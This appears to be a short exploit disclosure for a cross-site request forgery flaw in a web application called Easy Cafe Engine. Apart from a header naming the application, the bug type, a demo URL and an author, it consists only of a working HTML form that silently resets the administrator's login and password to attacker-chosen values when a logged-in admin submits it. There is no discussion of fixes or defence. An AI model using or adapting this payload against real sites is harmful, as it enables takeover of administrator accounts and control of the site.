< ------------------- header data start ------------------- >

#############################################################

# Application Name : Easy Cafe Engine

# Vulnerable Type : CSRF

# Demo : http://easy.cafeengine.com/admin.php

# Author : Jonturk75

#############################################################

< ------------------- header data end of ------------------- >

<form name=frm action=/admin.php?section=password method=POST enctype=multipart/form-data>
<input type=hidden name=action value=update_options>
<input type=hidden name=o[admin_login] value=admin>
<input type=hidden name=o[admin_password] value=’password’>
<input type=hidden name=admin_password_c value=’password’>
<input type=submit value=Submit>
</form>

< -- bug code end of -- >